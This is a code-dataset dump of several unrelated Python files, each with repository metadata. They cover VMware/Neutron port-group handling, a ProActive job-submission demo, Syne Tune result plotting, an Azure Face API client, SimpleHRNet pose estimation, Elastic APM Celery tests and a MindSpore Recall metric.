pg_name = portgroup_instance_mapping.pg_name
dvs_name = portgroup_instance_mapping.dvs_name
    # Create a port group on the distributed vSwitch with the requested
    # VLAN id for this instance's neutron network.
network_util.create_dvportgroup_task(session, pg_name, dvs_name,
vlan_num if create_vlan else 0,
cluster)
network_ref = network_util.get_network_with_the_name(session,
pg_name,
cluster)
return network_ref
def remove_neutron_relation_pg(session, cluster, portgroup_instance_mapping):
"""Create a vlan and bridge unless they already exist."""
pg_name = portgroup_instance_mapping.pg_name
dvs_name = portgroup_instance_mapping.dvs_name
    # Delete the port group on the distributed vSwitch that was created
    # for this neutron network.
network_util.delete_dvportgroup_task(session, pg_name, dvs_name, cluster)
def get_neutron_network(session, network_name, cluster, vif):
opaque = None
if vif['type'] != model.VIF_TYPE_DVS:
opaque = _get_opaque_network(session, cluster)
if opaque:
bridge = vif['network']['id']
opaque_networks = opaque.HostOpaqueNetworkInfo
network_ref = \
_get_network_ref_from_opaque(opaque_networks,
CONF.vmware.integration_bridge,
bridge)
else:
bridge = network_name
network_ref = network_util.get_network_with_the_name(
session, network_name, cluster)
if not network_ref:
raise exception.NetworkNotFoundForBridge(bridge=bridge)
return network_ref
def get_network_ref(session, cluster, vif, is_neutron, pg_vlan_instance_map):
if is_neutron:
portgroup_instance_mapping = pg_vlan_instance_map[vif['id']]
network_ref = get_neutron_network_with_vlan(
session,
vif,
portgroup_instance_mapping,
cluster)
else:
create_vlan = vif['network'].get_meta('should_create_vlan', False)
network_ref = ensure_vlan_bridge(session, vif, cluster=cluster,
create_vlan=create_vlan)
return network_ref
def get_vif_dict(session, cluster, vif_model, is_neutron, vif,
pg_vlan_instance_map):
mac = vif['address']
name = vif['network']['bridge'] or CONF.vmware.integration_bridge
ref = get_network_ref(
session,
cluster,
vif,
is_neutron,
pg_vlan_instance_map)
return {'network_name': name,
'mac_address': mac,
'network_ref': ref,
'iface_id': vif['id'],
'vif_model': vif_model}
def get_vif_info(session, cluster, is_neutron,
vif_model, network_info, pg_vlan_instance_map):
vif_infos = []
if network_info is None:
return vif_infos
for vif in network_info:
vif_infos.append(get_vif_dict(session, cluster, vif_model,
is_neutron, vif, pg_vlan_instance_map))
return vif_infos
def get_network_device(hardware_devices, mac_address):
"""Return the network device with MAC 'mac_address'."""
if hardware_devices.__class__.__name__ == "ArrayOfVirtualDevice":
hardware_devices = hardware_devices.VirtualDevice
for device in hardware_devices:
if device.__class__.__name__ in vm_util.ALL_SUPPORTED_NETWORK_DEVICES:
if hasattr(device, 'macAddress'):
if device.macAddress == mac_address:
return device
| 40.651982
| 78
| 0.62332
|
0c060fffd63e80fad5478d5838aeb3f8deb6786b
| 2,772
|
py
|
Python
|
demo.py
|
ow2-proactive/proactive-python-client
|
3f2291021f8fbcd6db7f919584b40d809c94fa88
|
[
"BSD-2-Clause"
] | 5
|
2018-04-04T12:37:18.000Z
|
2020-05-28T08:59:10.000Z
|
demo.py
|
ow2-proactive/proactive-python-client
|
3f2291021f8fbcd6db7f919584b40d809c94fa88
|
[
"BSD-2-Clause"
] | 11
|
2018-03-27T12:43:54.000Z
|
2022-01-18T07:01:02.000Z
|
demo.py
|
ow2-proactive/proactive-python-client
|
3f2291021f8fbcd6db7f919584b40d809c94fa88
|
[
"BSD-2-Clause"
] | 6
|
2018-03-15T16:17:01.000Z
|
2020-11-02T03:02:57.000Z
|
import os
import proactive
print("Logging on proactive-server...")
proactive_host = 'try.activeeon.com'
proactive_port = '8080'
proactive_url = "http://"+proactive_host+":"+proactive_port
print("Connecting on: " + proactive_url)
javaopts = []
# uncomment for detailed logs
# javaopts.append('-Dlog4j.configuration=file:'+os.path.join(os.getcwd(),'log4j.properties'))
redirectJVMOutput = False
gateway = proactive.ProActiveGateway(proactive_url, javaopts, redirectJVMOutput)
gateway.connect(username="", password="") # put your login here!
# Or uncomment the following line to protect your password
# gateway.connect(username="", password=getpass.getpass(prompt='Password: '))
assert gateway.isConnected() is True
print("Connected")
try:
print("Creating a proactive task...")
proactive_task = gateway.createPythonTask()
proactive_task.setTaskName("SimplePythonTask")
proactive_task.setTaskImplementation("""print("Hello world!")""")
# proactive_task.setTaskImplementationFromFile("scripts/print_python_env.py")
# proactive_task.setTaskImplementationFromFile("scripts/hello.py", ['param_a', 'param_b'])
# proactive_task.setTaskImplementationFromFile('main.py', ['param_1', 'param_2'])
# proactive_task.addInputFile('scripts/__init__.py')
# proactive_task.addInputFile('scripts/hello.py')
# proactive_task.setTaskImplementationFromLambdaFunction(lambda: 88 - 20 * 10)
# proactive_task.addGenericInformation("PYTHON_COMMAND", "/usr/local/bin/python3")
print("Adding a fork environment to the proactive task...")
proactive_fork_env = gateway.createDefaultForkEnvironment()
proactive_fork_env.setImplementationFromFile("scripts/fork_env.py")
proactive_task.setForkEnvironment(proactive_fork_env)
print("Adding a selection script to the proactive task...")
proactive_selection_script = gateway.createDefaultSelectionScript()
proactive_selection_script.setImplementation("selected = True")
# proactive_selection_script.setImplementationFromFile("scripts/selection_script.py")
proactive_task.setSelectionScript(proactive_selection_script)
print("Creating a proactive job...")
proactive_job = gateway.createJob()
proactive_job.setJobName("SimpleJob")
proactive_job.addTask(proactive_task)
proactive_job.setInputFolder(os.getcwd())
proactive_job.setOutputFolder(os.getcwd())
print("Submitting the job to the proactive scheduler...")
job_id = gateway.submitJob(proactive_job, debug=False)
print("job_id: " + str(job_id))
print("Getting job output...")
job_result = gateway.getJobResult(job_id)
print(job_result)
finally:
print("Disconnecting")
gateway.disconnect()
print("Disconnected")
gateway.terminate()
print("Finished")
| 42
| 94
| 0.758297
|
324db507a7a99c816e4f14473add5c7acc27831b
| 4,238
|
py
|
Python
|
benchmarking/benchmark_loop/plot_results.py
|
talesa/syne-tune
|
282156294a64a0cd260ccd908f3cf6b3e8c71003
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
benchmarking/benchmark_loop/plot_results.py
|
talesa/syne-tune
|
282156294a64a0cd260ccd908f3cf6b3e8c71003
|
[
"ECL-2.0",
"Apache-2.0"
] | 1
|
2022-02-25T15:56:36.000Z
|
2022-02-25T17:53:10.000Z
|
benchmarking/benchmark_loop/plot_results.py
|
talesa/syne-tune
|
282156294a64a0cd260ccd908f3cf6b3e8c71003
|
[
"ECL-2.0",
"Apache-2.0"
] | null | null | null |
# Copyright 2021 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License").
# You may not use this file except in compliance with the License.
# A copy of the License is located at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# or in the "license" file accompanying this file. This file is distributed
# on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either
# express or implied. See the License for the specific language governing
# permissions and limitations under the License.
import logging
from argparse import ArgumentParser
from pathlib import Path
from typing import Dict
import sagemaker
from matplotlib import cm
import numpy as np
from syne_tune.constants import ST_TUNER_TIME, SYNE_TUNE_FOLDER
from syne_tune.experiments import load_experiments_df
import matplotlib.pyplot as plt
def show_results(df_task, title: str, colors: Dict, show_seeds: bool = False):
if len(df_task) > 0:
metric = df_task.loc[:, 'metric'].values[0]
mode = df_task.loc[:, 'mode'].values[0]
fig, ax = plt.subplots()
for algorithm in sorted(df_task.algorithm.unique()):
ts = []
ys = []
df_scheduler = df_task[df_task.algorithm == algorithm]
for i, tuner_name in enumerate(df_scheduler.tuner_name.unique()):
sub_df = df_scheduler[df_scheduler.tuner_name == tuner_name]
sub_df = sub_df.sort_values(ST_TUNER_TIME)
t = sub_df.loc[:, ST_TUNER_TIME].values
y_best = sub_df.loc[:, metric].cummax().values if mode == 'max' else sub_df.loc[:, metric].cummin().values
if show_seeds:
ax.plot(t, y_best, color=colors[algorithm], alpha=0.2)
ts.append(t)
ys.append(y_best)
# compute the mean/std over time-series of different seeds at regular time-steps
# start/stop at respectively first/last point available for all seeds
t_min = max(tt[0] for tt in ts)
t_max = min(tt[-1] for tt in ts)
if t_min > t_max:
continue
t_range = np.linspace(t_min, t_max)
# find the best value at each regularly spaced time-step from t_range
y_ranges = []
for t, y in zip(ts, ys):
indices = np.searchsorted(t, t_range, side="left")
y_range = y[indices]
y_ranges.append(y_range)
y_ranges = np.stack(y_ranges)
mean = y_ranges.mean(axis=0)
std = y_ranges.std(axis=0)
ax.fill_between(
t_range, mean - std, mean + std,
color=colors[algorithm], alpha=0.1,
)
ax.plot(t_range, mean, color=colors[algorithm], label=algorithm)
ax.set_xlabel("wallclock time")
ax.set_ylabel(metric)
ax.legend()
ax.set_title(title)
(Path(__file__).parent / "figures").mkdir(exist_ok=True)
plt.savefig(f"figures/{title}.png")
plt.tight_layout()
plt.show()
if __name__ == '__main__':
parser = ArgumentParser()
parser.add_argument(
"--experiment_tag", type=str, required=True,
help="the experiment tag that was displayed when running launch_rl_benchmark.py"
)
args, _ = parser.parse_known_args()
experiment_tag = args.experiment_tag
logging.getLogger().setLevel(logging.INFO)
print(f"In case you ran experiments remotely, we assume that you pulled your results by running in a terminal: \n"
f"aws s3 sync s3://{sagemaker.Session().default_bucket()}/{SYNE_TUNE_FOLDER}/{experiment_tag}/ ~/syne-tune/")
experiment_filter = lambda exp: exp.metadata.get("tag") == experiment_tag
name_filter = lambda path: experiment_tag in path
df = load_experiments_df(name_filter, experiment_filter)
benchmarks = df.benchmark.unique()
for benchmark in benchmarks:
df_task = df.loc[df.benchmark == benchmark, :]
cmap = cm.Set3
colors = {algorithm: cmap(i) for i, algorithm in enumerate(df.algorithm.unique())}
show_results(df_task=df_task, title=benchmark, colors=colors)
| 39.981132
| 128
| 0.641812
|
1f7072c65b0c333a1f062a036bc5208e1dd479c0
| 2,660
|
py
|
Python
|
simplesensor/collection_modules/demographic_camera/azureImagePredictor.py
|
dbenge/SimpleSensor
|
0ec029da520e2c0563a407bec9c1290fe5226995
|
[
"Apache-2.0"
] | 7
|
2019-09-10T16:46:15.000Z
|
2022-03-12T18:42:15.000Z
|
simplesensor/collection_modules/demographic_camera/azureImagePredictor.py
|
dbenge/SimpleSensor
|
0ec029da520e2c0563a407bec9c1290fe5226995
|
[
"Apache-2.0"
] | 10
|
2017-12-18T18:37:08.000Z
|
2018-10-01T17:55:57.000Z
|
simplesensor/collection_modules/demographic_camera/azureImagePredictor.py
|
dbenge/SimpleSensor
|
0ec029da520e2c0563a407bec9c1290fe5226995
|
[
"Apache-2.0"
] | 12
|
2019-04-04T09:27:55.000Z
|
2022-03-31T05:09:17.000Z
|
"""
AzureImagePredictor
ImagePredictor implementation for Azure Face API
"""
from simplesensor.shared.threadsafeLogger import ThreadsafeLogger
from .imagePredictor import ImagePredictor
import urllib.parse
import json
import requests
# import logging
class AzureImagePredictor(ImagePredictor):
def __init__(self, moduleConfig=None, loggingQueue=None):
"""
        Initialize a new AzureImagePredictor instance.
Set parameters required by Azure Face API.
"""
# logging.basicConfig(level=logging.CRITICAL)
self.logger = ThreadsafeLogger(loggingQueue, "AzureImagePrediction") # Setup logging queue
self.config = moduleConfig
# Constants
self._subscriptionKey = self.config['Azure']['SubscriptionKey']
self._uriBase = self.config['Azure']['UriBase']
self._headers = {
'Content-Type': 'application/octet-stream',
'Ocp-Apim-Subscription-Key': self._subscriptionKey,
}
self._params = urllib.parse.urlencode({
"returnFaceId": "true",
"returnFaceLandmarks": "false",
"returnFaceAttributes": "age,gender,glasses,facialHair"
})
def get_prediction(self, imageBytes):
""" Get prediction results from Azure Face API.
Returns object with either a predictions array property or an error property.
"""
resultData = {}
try:
tempResult = self._get_prediction(imageBytes)
resultData['predictions'] = tempResult
except Exception as e:
self.logger.error('Error getting prediction: %s'%e)
resultData['error'] = str(e)
return resultData
def _get_prediction(self,imageBytes):
""" Execute REST API call and return result """
if len(self._subscriptionKey) < 10:
raise EnvironmentError('Azure subscription key - %s - is not valid'%self._subscriptionKey)
else:
try:
api_url = "https://%s/face/v1.0/detect?%s"% (self._uriBase, self._params)
r = requests.post(api_url,
headers=self._headers,
data=imageBytes)
if r.status_code != 200:
raise ValueError(
'Request to Azure returned an error %s, the response is:\n%s'
% (r.status_code, r.text)
)
jsonResult = r.json()
self.logger.debug("Got azure data %s" %jsonResult)
return jsonResult
except Exception as e:
self.logger.error(e)
| 34.102564
| 102
| 0.595865
|
4c82cdfcaa42ee37e34212249db588d2fe09fa08
| 15,456
|
py
|
Python
|
preprocess_data/simple-HRNet/SimpleHRNet.py
|
pxssw/GCN_ActionRecongtionTools
|
14a3826817c2066b6188f2139deb0969cc596521
|
[
"MIT"
] | 1
|
2020-11-04T09:18:23.000Z
|
2020-11-04T09:18:23.000Z
|
preprocess_data/simple-HRNet/SimpleHRNet.py
|
pxssw/GCN_ActionRecongtionTools
|
14a3826817c2066b6188f2139deb0969cc596521
|
[
"MIT"
] | null | null | null |
preprocess_data/simple-HRNet/SimpleHRNet.py
|
pxssw/GCN_ActionRecongtionTools
|
14a3826817c2066b6188f2139deb0969cc596521
|
[
"MIT"
] | null | null | null |
import cv2
import numpy as np
import torch
from torchvision.transforms import transforms
from models.hrnet import HRNet
from models.detectors.YOLOv3 import YOLOv3
class SimpleHRNet:
"""
SimpleHRNet class.
The class provides a simple and customizable method to load the HRNet network, load the official pre-trained
weights, and predict the human pose on single images.
Multi-person support with the YOLOv3 detector is also included (and enabled by default).
"""
def __init__(self,
c,
nof_joints,
checkpoint_path,
resolution=(384, 288),
interpolation=cv2.INTER_CUBIC,
multiperson=True,
return_bounding_boxes=False,
max_batch_size=32,
yolo_model_def="./models/detectors/yolo/config/yolov3.cfg",
yolo_class_path="./models/detectors/yolo/data/coco.names",
yolo_weights_path="./models/detectors/yolo/weights/yolov3.weights",
device=torch.device("cpu")):
"""
Initializes a new SimpleHRNet object.
HRNet (and YOLOv3) are initialized on the torch.device("device") and
its (their) pre-trained weights will be loaded from disk.
Args:
c (int): number of channels.
nof_joints (int): number of joints.
checkpoint_path (str): path to an official hrnet checkpoint or a checkpoint obtained with `train_coco.py`.
resolution (tuple): hrnet input resolution - format: (height, width).
Default: (384, 288)
interpolation (int): opencv interpolation algorithm.
Default: cv2.INTER_CUBIC
multiperson (bool): if True, multiperson detection will be enabled.
This requires the use of a people detector (like YOLOv3).
Default: True
return_bounding_boxes (bool): if True, bounding boxes will be returned along with poses by self.predict.
Default: False
max_batch_size (int): maximum batch size used in hrnet inference.
Useless without multiperson=True.
                Default: 32
yolo_model_def (str): path to yolo model definition file.
Default: "./models/detectors/yolo/config/yolov3.cfg"
yolo_class_path (str): path to yolo class definition file.
Default: "./models/detectors/yolo/data/coco.names"
yolo_weights_path (str): path to yolo pretrained weights file.
Default: "./models/detectors/yolo/weights/yolov3.weights.cfg"
device (:class:`torch.device`): the hrnet (and yolo) inference will be run on this device.
Default: torch.device("cpu")
"""
self.c = c
self.nof_joints = nof_joints
self.checkpoint_path = checkpoint_path
self.resolution = resolution # in the form (height, width) as in the original implementation
self.interpolation = interpolation
self.multiperson = multiperson
self.return_bounding_boxes = return_bounding_boxes
self.max_batch_size = max_batch_size
self.yolo_model_def = yolo_model_def
self.yolo_class_path = yolo_class_path
self.yolo_weights_path = yolo_weights_path
self.device = device
self.model = HRNet(c=c, nof_joints=nof_joints).to(device)
checkpoint = torch.load(checkpoint_path, map_location=self.device)
if 'model' in checkpoint:
self.model.load_state_dict(checkpoint['model'])
else:
self.model.load_state_dict(checkpoint)
self.model.eval()
if not self.multiperson:
self.transform = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),
])
else:
self.detector = YOLOv3(model_def=yolo_model_def,
class_path=yolo_class_path,
weights_path=yolo_weights_path,
classes=('person',),
max_batch_size=self.max_batch_size,
device=device)
self.transform = transforms.Compose([
transforms.ToPILImage(),
transforms.Resize((self.resolution[0], self.resolution[1])), # (height, width)
transforms.ToTensor(),
transforms.Normalize(mean=[0.485, 0.456, 0.406], std=[0.229, 0.224, 0.225]),
])
def predict(self, image):
"""
Predicts the human pose on a single image or a stack of n images.
Args:
image (:class:`np.ndarray`):
the image(s) on which the human pose will be estimated.
image is expected to be in the opencv format.
image can be:
- a single image with shape=(height, width, BGR color channel)
- a stack of n images with shape=(n, height, width, BGR color channel)
Returns:
:class:`np.ndarray`:
a numpy array containing human joints for each (detected) person.
Format:
if image is a single image:
shape=(# of people, # of joints (nof_joints), 3); dtype=(np.float32).
if image is a stack of n images:
list of n np.ndarrays with
shape=(# of people, # of joints (nof_joints), 3); dtype=(np.float32).
Each joint has 3 values: (x position, y position, joint confidence).
If self.return_bounding_boxes, the class returns a list with (bounding boxes, human joints)
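        A hypothetical single-image call (checkpoint path, channel count and
        joint count are illustrative)::
            model = SimpleHRNet(48, 17, "./weights/pose_hrnet_w48_384x288.pth")
            frame = cv2.imread("person.jpg")  # (height, width, BGR)
            joints = model.predict(frame)     # (# of people, 17, 3)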
"""
if len(image.shape) == 3:
return self._predict_single(image)
elif len(image.shape) == 4:
return self._predict_batch(image)
else:
raise ValueError('Wrong image format.')
def _predict_single(self, image):
if not self.multiperson:
old_res = image.shape
if self.resolution is not None:
image = cv2.resize(
image,
(self.resolution[1], self.resolution[0]), # (width, height)
interpolation=self.interpolation
)
images = self.transform(cv2.cvtColor(image, cv2.COLOR_BGR2RGB)).unsqueeze(dim=0)
boxes = np.asarray([[0, 0, old_res[1], old_res[0]]], dtype=np.float32) # [x1, y1, x2, y2]
else:
detections = self.detector.predict_single(image)
boxes = []
if detections is not None:
images = torch.empty((len(detections), 3, self.resolution[0], self.resolution[1])) # (height, width)
for i, (x1, y1, x2, y2, conf, cls_conf, cls_pred) in enumerate(detections):
x1 = int(round(x1.item()))
x2 = int(round(x2.item()))
y1 = int(round(y1.item()))
y2 = int(round(y2.item()))
# Adapt detections to match HRNet input aspect ratio (as suggested by xtyDoge in issue #14)
correction_factor = self.resolution[0] / self.resolution[1] * (x2 - x1) / (y2 - y1)
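                    # factor > 1 means the box is relatively wider than the network
                    # input, so the crop is grown along y; factor < 1 means it is
                    # relatively taller, so the crop is grown along x. This keeps the
                    # person roughly undistorted after the resize to self.resolution.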
if correction_factor > 1:
# increase y side
center = y1 + (y2 - y1) // 2
length = int(round((y2 - y1) * correction_factor))
y1 = max(0, center - length // 2)
y2 = min(image.shape[0], center + length // 2)
elif correction_factor < 1:
# increase x side
center = x1 + (x2 - x1) // 2
length = int(round((x2 - x1) * 1 / correction_factor))
x1 = max(0, center - length // 2)
x2 = min(image.shape[1], center + length // 2)
boxes.append([x1, y1, x2, y2])
images[i] = self.transform(image[y1:y2, x1:x2, ::-1])
else:
images = torch.empty((0, 3, self.resolution[0], self.resolution[1])) # (height, width)
boxes = np.asarray(boxes, dtype=np.int32)
if images.shape[0] > 0:
images = images.to(self.device)
with torch.no_grad():
if len(images) <= self.max_batch_size:
out = self.model(images)
else:
out = torch.empty(
(images.shape[0], self.nof_joints, self.resolution[0] // 4, self.resolution[1] // 4),
device=self.device
)
for i in range(0, len(images), self.max_batch_size):
out[i:i + self.max_batch_size] = self.model(images[i:i + self.max_batch_size])
out = out.detach().cpu().numpy()
pts = np.empty((out.shape[0], out.shape[1], 3), dtype=np.float32)
# For each human, for each joint: x, y, confidence
for i, human in enumerate(out):
for j, joint in enumerate(human):
pt = np.unravel_index(np.argmax(joint), (self.resolution[0] // 4, self.resolution[1] // 4))
# 0: pt_x / (width // 4) * (bb_x2 - bb_x1) + bb_x1
# 1: pt_y / (height // 4) * (bb_y2 - bb_y1) + bb_y1
# 2: confidences
pts[i, j, 0] = pt[0] * 1. / (self.resolution[0] // 4) * (boxes[i][3] - boxes[i][1]) + boxes[i][1]
pts[i, j, 1] = pt[1] * 1. / (self.resolution[1] // 4) * (boxes[i][2] - boxes[i][0]) + boxes[i][0]
pts[i, j, 2] = joint[pt]
else:
pts = np.empty((0, 0, 3), dtype=np.float32)
if self.return_bounding_boxes:
return boxes, pts
else:
return pts
def _predict_batch(self, images):
if not self.multiperson:
old_res = images[0].shape
if self.resolution is not None:
images_tensor = torch.empty(images.shape[0], 3, self.resolution[0], self.resolution[1])
else:
images_tensor = torch.empty(images.shape[0], 3, images.shape[1], images.shape[2])
for i, image in enumerate(images):
if self.resolution is not None:
image = cv2.resize(
image,
(self.resolution[1], self.resolution[0]), # (width, height)
interpolation=self.interpolation
)
image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)
images_tensor[i] = self.transform(image)
images = images_tensor
boxes = np.repeat(
np.asarray([[0, 0, old_res[1], old_res[0]]], dtype=np.float32), len(images), axis=0
) # [x1, y1, x2, y2]
else:
image_detections = self.detector.predict(images)
boxes = []
images_tensor = []
for d, detections in enumerate(image_detections):
image = images[d]
boxes_image = []
if detections is not None:
images_tensor_image = torch.empty(
(len(detections), 3, self.resolution[0], self.resolution[1])) # (height, width)
for i, (x1, y1, x2, y2, conf, cls_conf, cls_pred) in enumerate(detections):
x1 = int(round(x1.item()))
x2 = int(round(x2.item()))
y1 = int(round(y1.item()))
y2 = int(round(y2.item()))
# Adapt detections to match HRNet input aspect ratio (as suggested by xtyDoge in issue #14)
correction_factor = self.resolution[0] / self.resolution[1] * (x2 - x1) / (y2 - y1)
if correction_factor > 1:
# increase y side
center = y1 + (y2 - y1) // 2
length = int(round((y2 - y1) * correction_factor))
y1 = max(0, center - length // 2)
y2 = min(image.shape[0], center + length // 2)
elif correction_factor < 1:
# increase x side
center = x1 + (x2 - x1) // 2
length = int(round((x2 - x1) * 1 / correction_factor))
x1 = max(0, center - length // 2)
x2 = min(image.shape[1], center + length // 2)
boxes_image.append([x1, y1, x2, y2])
images_tensor_image[i] = self.transform(image[y1:y2, x1:x2, ::-1])
else:
images_tensor_image = torch.empty((0, 3, self.resolution[0], self.resolution[1])) # (height, width)
# stack all images and boxes in single lists
images_tensor.extend(images_tensor_image)
boxes.extend(boxes_image)
# convert lists into tensors/np.ndarrays
images = torch.tensor(np.stack(images_tensor))
boxes = np.asarray(boxes, dtype=np.int32)
images = images.to(self.device)
with torch.no_grad():
if len(images) <= self.max_batch_size:
out = self.model(images)
else:
out = torch.empty(
(images.shape[0], self.nof_joints, self.resolution[0] // 4, self.resolution[1] // 4),
device=self.device
)
for i in range(0, len(images), self.max_batch_size):
out[i:i + self.max_batch_size] = self.model(images[i:i + self.max_batch_size])
out = out.detach().cpu().numpy()
pts = np.empty((out.shape[0], out.shape[1], 3), dtype=np.float32)
# For each human, for each joint: x, y, confidence
for i, human in enumerate(out):
for j, joint in enumerate(human):
pt = np.unravel_index(np.argmax(joint), (self.resolution[0] // 4, self.resolution[1] // 4))
# 0: pt_x / (width // 4) * (bb_x2 - bb_x1) + bb_x1
# 1: pt_y / (height // 4) * (bb_y2 - bb_y1) + bb_y1
# 2: confidences
pts[i, j, 0] = pt[0] * 1. / (self.resolution[0] // 4) * (boxes[i][3] - boxes[i][1]) + boxes[i][1]
pts[i, j, 1] = pt[1] * 1. / (self.resolution[1] // 4) * (boxes[i][2] - boxes[i][0]) + boxes[i][0]
pts[i, j, 2] = joint[pt]
if self.multiperson:
# re-add the removed batch axis (n)
pts_batch = []
index = 0
for detections in image_detections:
if detections is not None:
pts_batch.append(pts[index:index + len(detections)])
index += len(detections)
else:
pts_batch.append(np.zeros((0, self.nof_joints, 3), dtype=np.float32))
pts = pts_batch
else:
pts = np.expand_dims(pts, axis=1)
if self.return_bounding_boxes:
return boxes, pts
else:
return pts
| 45.458824
| 120
| 0.51721
|
93e10cd7c81fefa4ed5dc7fa524df0aac1c78a60
| 3,422
|
py
|
Python
|
tests/contrib/celery/django_tests.py
|
ollyhowell/apm-agent-python
|
0fd5e2cf63b7d6c9010209d360fbded13dc6e9ab
|
[
"BSD-3-Clause"
] | 350
|
2017-08-17T12:27:08.000Z
|
2022-03-30T10:01:33.000Z
|
tests/contrib/celery/django_tests.py
|
ollyhowell/apm-agent-python
|
0fd5e2cf63b7d6c9010209d360fbded13dc6e9ab
|
[
"BSD-3-Clause"
] | 1,115
|
2017-08-17T15:30:35.000Z
|
2022-03-31T16:02:52.000Z
|
tests/contrib/celery/django_tests.py
|
ollyhowell/apm-agent-python
|
0fd5e2cf63b7d6c9010209d360fbded13dc6e9ab
|
[
"BSD-3-Clause"
] | 180
|
2017-08-17T12:26:53.000Z
|
2022-03-25T09:25:37.000Z
|
# -*- coding: utf-8 -*-
# BSD 3-Clause License
#
# Copyright (c) 2019, Elasticsearch BV
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import pytest # isort:skip
django = pytest.importorskip("django") # isort:skip
celery = pytest.importorskip("celery") # isort:skip
from elasticapm.conf.constants import ERROR, TRANSACTION
from elasticapm.contrib.celery import register_exception_tracking, register_instrumentation
from tests.contrib.django.testapp.tasks import failing_task, successful_task
pytestmark = [pytest.mark.celery, pytest.mark.django]
def test_failing_celery_task(django_elasticapm_client):
register_exception_tracking(django_elasticapm_client)
t = failing_task.delay()
assert t.state == "FAILURE"
assert len(django_elasticapm_client.events[ERROR]) == 1
assert len(django_elasticapm_client.events[TRANSACTION]) == 1
error = django_elasticapm_client.events[ERROR][0]
assert error["culprit"] == "tests.contrib.django.testapp.tasks.failing_task"
assert error["exception"]["message"] == "ValueError: foo"
assert error["exception"]["handled"] is False
transaction = django_elasticapm_client.events[TRANSACTION][0]
assert transaction["name"] == "tests.contrib.django.testapp.tasks.failing_task"
assert transaction["type"] == "celery"
assert transaction["result"] == "FAILURE"
assert transaction["outcome"] == "failure"
def test_successful_celery_task_instrumentation(django_elasticapm_client):
register_instrumentation(django_elasticapm_client)
t = successful_task.delay()
assert t.state == "SUCCESS"
assert len(django_elasticapm_client.events[TRANSACTION]) == 1
transaction = django_elasticapm_client.events[TRANSACTION][0]
assert transaction["name"] == "tests.contrib.django.testapp.tasks.successful_task"
assert transaction["type"] == "celery"
assert transaction["result"] == "SUCCESS"
assert transaction["outcome"] == "success"
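# A minimal sketch (not part of this file) of what the imported tasks could look like,
# inferred only from the assertions above (ValueError("foo") for the failing task); the
# actual definitions in tests.contrib.django.testapp.tasks may differ.
from celery import shared_task

@shared_task
def successful_task():
    return "OK"

@shared_task
def failing_task():
    raise ValueError("foo")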
| 46.876712
| 91
| 0.763004
|
2ee6b5db8457979f7a03c9a2a1de8ff2531335c0
| 6,335
|
py
|
Python
|
mindspore/nn/metrics/recall.py
|
taroxd/mindspore
|
9bb620ff2caaac7f1c53c4b104935f22352cb88f
|
[
"Apache-2.0"
] | null | null | null |
mindspore/nn/metrics/recall.py
|
taroxd/mindspore
|
9bb620ff2caaac7f1c53c4b104935f22352cb88f
|
[
"Apache-2.0"
] | null | null | null |
mindspore/nn/metrics/recall.py
|
taroxd/mindspore
|
9bb620ff2caaac7f1c53c4b104935f22352cb88f
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
"""Recall."""
import sys
import numpy as np
from mindspore._checkparam import Validator as validator
from ._evaluation import EvaluationBase
class Recall(EvaluationBase):
r"""
Calculates recall for classification and multilabel data.
The recall class creates two local variables, :math:`\text{true_positive}` and :math:`\text{false_negative}`,
that are used to compute the recall. This value is ultimately returned as the recall, an idempotent operation
that simply divides :math:`\text{true_positive}` by the sum of :math:`\text{true_positive}` and
:math:`\text{false_negative}`.
.. math::
\text{recall} = \frac{\text{true_positive}}{\text{true_positive} + \text{false_negative}}
Note:
In the multi-label cases, the elements of :math:`y` and :math:`y_{pred}` must be 0 or 1.
Args:
eval_type (str): Metric to calculate the recall over a dataset, for classification or
multilabel. Default: 'classification'.
Examples:
>>> x = Tensor(np.array([[0.2, 0.5], [0.3, 0.1], [0.9, 0.6]]))
>>> y = Tensor(np.array([1, 0, 1]))
>>> metric = nn.Recall('classification')
>>> metric.clear()
>>> metric.update(x, y)
>>> recall = metric.eval()
>>> print(recall)
[1. 0.5]
"""
def __init__(self, eval_type='classification'):
super(Recall, self).__init__(eval_type)
self.eps = sys.float_info.min
self.clear()
def clear(self):
"""Clears the internal evaluation result."""
self._class_num = 0
